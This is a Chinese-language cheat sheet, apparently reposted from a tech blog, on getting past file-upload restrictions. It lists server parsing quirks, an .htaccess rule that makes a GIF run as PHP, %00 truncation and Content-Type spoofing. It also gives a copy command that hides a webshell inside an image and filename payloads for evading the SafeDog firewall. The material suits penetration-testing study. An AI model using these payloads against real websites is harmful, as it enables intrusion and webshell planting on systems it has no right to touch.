目錄
資訊搜集
繞過驗證
1.前端驗證
2.黑名單
3.白名單
4.其他
繞過安全狗
資訊搜集
1.查找上傳位置
黑盒:猜測或通過掃描工具獲得到網站的路徑(upload.php等),找到檔案上傳的地方,一般在會員中心,
白盒:根據代碼分析到檔案上傳
2.CMS原始碼,第三方應用
可以查找利用漏洞,直接進行上傳
3.決議器
常見決議漏洞
- IIS5.x-6.x :
①目錄決議:/xx.asp/xx.jpg ② 檔案決議:test.asp;1.jpg
- IIS 7.0/IIS 7.5/Nginx < 8.03:
例如訪問http://127.0.0.1/1.jpg/1.php,此時的1.jpg會被當作PHP腳本來決議,此時1.php是不存在的,
- Nginx <8.03
如果檔案是1.jpg 則訪問1.jpg%00.php
- Apache 1.x和Apache 2.x
1.php.xxx
繞過驗證
1.前端驗證
抓包,修改格式
2.黑名單
- 大小寫,空格,點,雙后綴防替換,::DATA,其他格式(php5...),目錄命名(x.php/.)
- .htaccess 僅在apache服務器中
<FilesMatch "1.gif">
SetHandler application/x-httpd-php
AddHandler php5-script .gif
</FilesMatch>
//把1.gif決議為php,可操控性強,上傳格式隨意變
3.白名單
- %00截斷(被服務器決議時截斷并且可以繞過白名單后綴,還可以防止時間戳命名法)
條件: php版本小于5.3.4 php的magic_quotes_gpc為OFF狀態 GET提交: 直接在資料包后面加%00 POST提交: 在后面加+然后hex將2b改為00 如果在資料包的內容中,就需要url decode
- 檔案頭驗證(Content-Type)
修改為符合的檔案頭
- 檔案內容檢測
圖片木馬//需要配合檔案包含漏洞,或者當驗證檔案頭的時候配合htaccess決議漏洞
copy 1.png /b + shell.php /a webshell.jpg
驗證函式
getimagesize
exif-imagetype等- 目錄命名 php/.jpg
4.其他
- 二次渲染
先發送到repeater回顯,然后獲得第一次路徑,然后爆破,訪問,因為在檔案被訪問的時候,無法被洗掉
修改xxf然后爆破,瘋狂去訪問,等剛好卡到那個頁面,去連接菜刀,
繞過安全狗
繞過安全狗無非:資料溢位, 符號變異,截斷,換行,重復資料(不影響執行資料的情況下)
filename="x.php
filename='x.php
filename="a.jpg;.php";
filename="a.php%00.jpg"
filename="Content-Disposition: form-data; name="upload_file";x.php" filename="x.jpg";filename="x.jpg";.....filename="x.php";
filename="/jpeg;x.php"
filename="/jpeg;/x.php"★FUZZ字典爆破
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/397573.html
標籤:其他